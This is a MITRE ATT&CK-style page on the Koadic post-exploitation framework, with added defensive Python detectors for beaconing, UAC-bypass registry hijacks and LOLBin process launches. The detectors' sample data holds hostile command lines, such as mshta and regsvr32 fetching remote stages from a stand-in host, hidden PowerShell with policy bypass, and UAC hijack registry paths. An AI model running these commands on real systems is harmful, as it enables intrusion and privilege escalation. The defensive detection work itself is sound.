Koadic

Koadic is a Windows post-exploitation framework and penetration testing tool that is publicly available on GitHub. Koadic has several options for staging payloads and creating implants, and performs most of its operations using Windows Script Host.[1][2][3]

ID: S0250
Type: TOOL
Platforms: Windows
Version: 2.0
Created: 17 October 2018
Last Modified: 27 September 2024

Techniques Used

Domain ID Name Use
Enterprise T1047 Windows Management Instrumentation

Koadic can use WMI to execute commands.[1]

Enterprise T1005 Data from Local System

Koadic can download files off the target system to send back to the server.[1][3]

Enterprise T1115 Clipboard Data

Koadic can retrieve the current content of the user clipboard.[1]

Enterprise T1573 .002 Encrypted Channel: Asymmetric Cryptography

Koadic can use SSL and TLS for communications.[1]

Enterprise T1547 .001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

Koadic has added persistence to the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Registry key.[3]

Enterprise T1059 .001 Command and Scripting Interpreter: PowerShell

Koadic has used PowerShell to establish persistence.[3]

.003 Command and Scripting Interpreter: Windows Command Shell

Koadic can open an interactive command shell to perform command-line functions on victim machines. Koadic performs most of its operations using Windows Script Host (JScript) and can run arbitrary shellcode.[1][3]

.005 Command and Scripting Interpreter: Visual Basic

Koadic performs most of its operations using Windows Script Host (VBScript) and can run arbitrary shellcode.[1]

Enterprise T1071 .001 Application Layer Protocol: Web Protocols

Koadic has used HTTP for C2 communications.[3]
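One way to hunt for this behaviour is to look for HTTP(S) connections that originate from a Windows Script Host process rather than a browser and that recur at a steady cadence. The block below is an added example, not Koadic's code: the input lines mirror Sysmon Event ID 3 (network connection) fields, and the poll interval, port and addresses in the sample are constructed assumptions, since the page states only that Koadic uses HTTP and TLS.

```python
"""Hunt for HTTP(S) C2 polling that originates from a Windows Script Host
process rather than a browser.

Added example, not Koadic's code. Input lines mirror Sysmon Event ID 3
(network connection) fields: UTC timestamp, originating image, destination
IP, destination port. The poll interval, port and addresses in the sample
are constructed assumptions, not the tool's defaults.
"""
from collections import defaultdict
from datetime import datetime, timezone
from statistics import mean, pstdev
from typing import Dict, List, Tuple

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "rundll32.exe", "regsvr32.exe"}


def parse(line: str) -> Tuple[datetime, str, str]:
    """'2024-09-27T10:00:00Z,C:\\Windows\\System32\\mshta.exe,198.51.100.7,8080'
    -> (timestamp, 'mshta.exe', '198.51.100.7:8080')"""
    ts, image, ip, port = line.strip().split(",")
    when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return when, image.rsplit("\\", 1)[-1].lower(), f"{ip}:{int(port)}"


def beacon_candidates(lines: List[str], min_conns: int = 5, max_cv: float = 0.2) -> List[Dict]:
    """Group connections by (image, destination); report script-host sources
    whose inter-connection gaps are nearly constant. cv = stdev/mean of the
    gaps, so 0 is a perfect metronome and anything under max_cv is regular."""
    by_key: Dict[Tuple[str, str], List[datetime]] = defaultdict(list)
    for line in lines:
        when, image, dst = parse(line)
        by_key[(image, dst)].append(when)
    out: List[Dict] = []
    for (image, dst), times in by_key.items():
        if image not in SCRIPT_HOSTS or len(times) < min_conns:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        cv = pstdev(gaps) / avg if avg > 0 else float("inf")
        if cv <= max_cv:
            out.append({"image": image, "dst": dst, "count": len(times),
                        "interval_s": round(avg, 1), "cv": round(cv, 3)})
    return out


# Constructed sample: mshta.exe polling one destination every ~10 s, a
# browser polling just as regularly (ignored: not a script host), and
# wscript.exe with irregular traffic (ignored: high cv).
SAMPLE_EVENTS = [
    f"2024-09-27T10:{m:02d}:{s:02d}Z,C:\\Windows\\System32\\mshta.exe,198.51.100.7,8080"
    for m, s in [(0, 0), (0, 10), (0, 21), (0, 30), (0, 40), (0, 51), (1, 0), (1, 10)]
] + [
    f"2024-09-27T10:00:{s:02d}Z,C:\\Program Files\\Browser\\browser.exe,203.0.113.5,443"
    for s in range(0, 60, 10)
] + [
    f"2024-09-27T10:{m:02d}:{s:02d}Z,C:\\Windows\\System32\\wscript.exe,192.0.2.10,80"
    for m, s in [(5, 0), (5, 5), (6, 5), (6, 10), (8, 20)]
]

if __name__ == "__main__":
    for hit in beacon_candidates(SAMPLE_EVENTS):
        print(hit)
```

The script-host filter is what keeps this from drowning in browser keep-alives and update checks; a TLS-wrapped channel still shows the same cadence at the connection level, so the check does not depend on seeing request contents.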

Enterprise T1003 .002 OS Credential Dumping: Security Account Manager

Koadic can gather hashed passwords by dumping the SAM and SECURITY hives.[1]

.003 OS Credential Dumping: NTDS

Koadic can gather hashed passwords by extracting domain controller hashes from NTDS.[1]

Enterprise T1083 File and Directory Discovery

Koadic can obtain a list of directories.[3]

Enterprise T1548 .002 Abuse Elevation Control Mechanism: Bypass User Account Control

Koadic has two methods for elevating integrity: it can bypass UAC through eventvwr.exe and through sdclt.exe.[1]
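Both of these bypasses work by planting a command under HKCU\Software\Classes so that an auto-elevating binary picks it up before the HKLM default, and the Run-key persistence noted under T1547.001 above lives in the same hive. The block below is an added example, not Koadic's code, that audits HKCU for both: the hijack paths are the publicly documented locations those two bypasses write to, and the registry backend is injected so the same logic runs against constructed data off a Windows host.

```python
"""Audit HKCU for the registry hijacks behind the eventvwr.exe and sdclt.exe
UAC bypasses and for Run-key persistence that launches a script host.

Added example, not Koadic's code. The hijack paths are the publicly
documented locations those two bypasses write to; the registry backend is
injected so the same logic runs against constructed data off a Windows host.
"""
import re
from typing import Callable, Dict, List, Optional

# HKCU keys consulted by the auto-elevating binary before HKCR. A clean user
# profile does not have them, so mere presence is the finding.
UAC_HIJACK_KEYS = {
    r"Software\Classes\mscfile\shell\open\command": "eventvwr.exe",
    r"Software\Classes\Folder\shell\open\command": "sdclt.exe (Windows 10)",
    r"Software\Classes\exefile\shell\runas\command": "sdclt.exe (older builds, IsolatedCommand)",
}
RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"

# Hosts a Windows Script Host implant or its stager runs under.
SCRIPT_HOSTS = re.compile(
    r"(?:^|[\\\s\"])(?:mshta|wscript|cscript|rundll32|regsvr32|powershell)(?:\.exe)?\b",
    re.IGNORECASE,
)

# Backend contract: HKCU subkey path -> {value_name: data}, or None if the key is absent.
Reader = Callable[[str], Optional[Dict[str, str]]]


def winreg_reader(path: str) -> Optional[Dict[str, str]]:
    """Live backend (Windows only): every value of one HKCU subkey."""
    import winreg  # assumption: running on the host being audited
    try:
        key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, path)
    except FileNotFoundError:
        return None
    values: Dict[str, str] = {}
    with key:
        index = 0
        while True:
            try:
                name, data, _ = winreg.EnumValue(key, index)
            except OSError:  # no more values
                break
            values[name or "(Default)"] = str(data)
            index += 1
    return values


def audit_hkcu(read: Reader) -> List[str]:
    """Return one finding per hijack key present and per suspicious Run value."""
    findings: List[str] = []
    for path, bypass in UAC_HIJACK_KEYS.items():
        values = read(path)
        if values is not None:
            command = values.get("(Default)") or values.get("IsolatedCommand") or ""
            findings.append(f"UAC hijack key present ({bypass}): HKCU\\{path} -> {command!r}")
    for name, command in (read(RUN_KEY) or {}).items():
        lowered = command.lower()
        if SCRIPT_HOSTS.search(command) or "-windowstyle hidden" in lowered or "javascript:" in lowered:
            findings.append(f"Run value {name!r} launches a script host: {command!r}")
    return findings


# Constructed sample state, not taken from a real host: one hijacked
# eventvwr.exe handler and one hidden-PowerShell Run value beside a benign one.
SAMPLE_HKCU: Dict[str, Dict[str, str]] = {
    r"Software\Classes\mscfile\shell\open\command": {
        "(Default)": r"C:\Windows\System32\mshta.exe http://198.51.100.7:8080/stage",
    },
    RUN_KEY: {
        "OneDrive": r'"C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
        "Updater": r"powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Users\u\AppData\Roaming\u.ps1",
    },
}


def sample_reader(path: str) -> Optional[Dict[str, str]]:
    return SAMPLE_HKCU.get(path)


if __name__ == "__main__":
    for finding in audit_hkcu(sample_reader):
        print(finding)
```

On a live host call audit_hkcu(winreg_reader) per interactive user; the hijack keys are worth alerting on even when empty, because nothing legitimate creates them under HKCU, while Run values need the content check since the key is populated on every profile.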

Enterprise T1218 .005 System Binary Proxy Execution: Mshta

Koadic can use mshta to serve additional payloads and to help schedule tasks for persistence.[1][3]

.010 System Binary Proxy Execution: Regsvr32

Koadic can use Regsvr32 to execute additional payloads.[1]

.011 System Binary Proxy Execution: Rundll32

Koadic can use Rundll32 to execute additional payloads.[1]

Enterprise T1082 System Information Discovery

Koadic can obtain the OS version and build, computer name, and processor architecture from a compromised host.[3]

Enterprise T1033 System Owner/User Discovery

Koadic can identify logged-in users across the domain and view user sessions.[1][3]

Enterprise T1569 .002 System Services: Service Execution

Koadic can run a command on another machine using PsExec.[1]

Enterprise T1016 System Network Configuration Discovery

Koadic can retrieve the contents of the IP routing table as well as information about the Windows domain.[1][3]

Enterprise T1135 Network Share Discovery

Koadic can scan the local network for hosts with SMB open.[1]

Enterprise T1046 Network Service Discovery

Koadic can scan for open TCP ports on the target network.[1]

Enterprise T1105 Ingress Tool Transfer

Koadic can download additional files and tools.[1][3]

Enterprise T1055 .001 Process Injection: Dynamic-link Library Injection

Koadic can perform process injection by using a reflective DLL.[1]

Enterprise T1021 .001 Remote Services: Remote Desktop Protocol

Koadic can enable remote desktop on the victim's machine.[1]

Enterprise T1564 .003 Hide Artifacts: Hidden Window

Koadic has used the command Powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden to hide its window.[3]

Enterprise T1053 .005 Scheduled Task/Job: Scheduled Task

Koadic has used scheduled tasks to add persistence.[3]
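The proxy-execution entries (Mshta, Regsvr32, Rundll32), the hidden PowerShell window and the scheduled-task persistence above all leave a trace in process-creation telemetry. The block below is an added example, not Koadic's code: it classifies constructed process-creation events shaped like Sysmon Event ID 1 / Security 4688 records, and its command-line patterns are generic LOLBin signatures rather than a verbatim record of Koadic's own stagers.

```python
"""Flag process-creation events that match the staging, hiding and
persistence behaviours listed above: remote payloads pulled through
mshta/regsvr32/rundll32, hidden PowerShell, schtasks whose action is a
script host, and shells spawned by a script host.

Added example, not Koadic's code. The event shape (parent image, image,
command line) follows Sysmon Event ID 1 / Security 4688; the sample events
are constructed, and the patterns are generic LOLBin signatures rather than a
verbatim record of Koadic's own stagers.
"""
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class ProcEvent:
    parent: str   # parent image file name, e.g. "explorer.exe"
    image: str    # created image file name, e.g. "mshta.exe"
    cmdline: str  # command line as logged


SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "rundll32.exe", "regsvr32.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
URL = re.compile(r"https?://", re.IGNORECASE)
# Accept the abbreviated switch forms PowerShell allows (-w hidden, -ep bypass).
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.IGNORECASE)
BYPASS = re.compile(r"-e(?:xecutionpolicy|p)\s+bypass\b", re.IGNORECASE)


def classify(ev: ProcEvent) -> List[str]:
    """Return the technique labels an event matches (empty list if benign)."""
    hits: List[str] = []
    image, cl = ev.image.lower(), ev.cmdline.lower()
    if image == "mshta.exe" and (URL.search(cl) or "javascript:" in cl or "vbscript:" in cl):
        hits.append("T1218.005 mshta running a remote or inline script")
    if image == "regsvr32.exe" and "scrobj.dll" in cl and "/i:" in cl and URL.search(cl):
        hits.append("T1218.010 regsvr32 loading a remote scriptlet through scrobj.dll")
    if image == "rundll32.exe" and ("javascript:" in cl or "runhtmlapplication" in cl):
        hits.append("T1218.011 rundll32 executing script via mshtml RunHTMLApplication")
    if image == "powershell.exe" and HIDDEN.search(cl) and BYPASS.search(cl):
        hits.append("T1564.003 hidden PowerShell window with ExecutionPolicy Bypass")
    if image == "schtasks.exe" and "/create" in cl and any(
        host[:-4] in cl for host in SCRIPT_HOSTS | {"powershell.exe"}
    ):
        hits.append("T1053.005 scheduled task whose action is a script host")
    if ev.parent.lower() in SCRIPT_HOSTS and image in SHELLS:
        hits.append(f"T1059 {image} spawned by script host {ev.parent.lower()}")
    return hits


def scan(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """(event index, label) for every hit across a batch of events."""
    return [(i, label) for i, ev in enumerate(events) for label in classify(ev)]


# Constructed sample batch (addresses from the TEST-NET-2 range), not real telemetry.
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "mshta.exe", "mshta.exe http://198.51.100.7:8080/stage"),
    ProcEvent("cmd.exe", "regsvr32.exe", "regsvr32 /s /n /u /i:http://198.51.100.7:8080/sct scrobj.dll"),
    ProcEvent("mshta.exe", "cmd.exe", "cmd.exe /c whoami"),
    ProcEvent("cmd.exe", "powershell.exe",
              r"powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Users\u\AppData\Roaming\a.ps1"),
    ProcEvent("cmd.exe", "schtasks.exe",
              'schtasks /create /sc minute /mo 5 /tn Updater /tr "mshta http://198.51.100.7:8080/task"'),
    ProcEvent("explorer.exe", "regsvr32.exe", r"regsvr32.exe /s C:\Program Files\Vendor\plugin.dll"),  # benign
    ProcEvent("services.exe", "rundll32.exe", "rundll32.exe shell32.dll,Control_RunDLL"),  # benign
]

if __name__ == "__main__":
    for index, label in scan(SAMPLE_EVENTS):
        print(f"[{index}] {label}: {SAMPLE_EVENTS[index].cmdline}")
```

The parent/child rule is the one that survives stager variation: whatever binary proxied the initial script, an interactive shell opened from a Windows Script Host implant still shows up as cmd.exe or powershell.exe with mshta.exe, wscript.exe, rundll32.exe or regsvr32.exe as its parent.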

Groups That Use This Software

References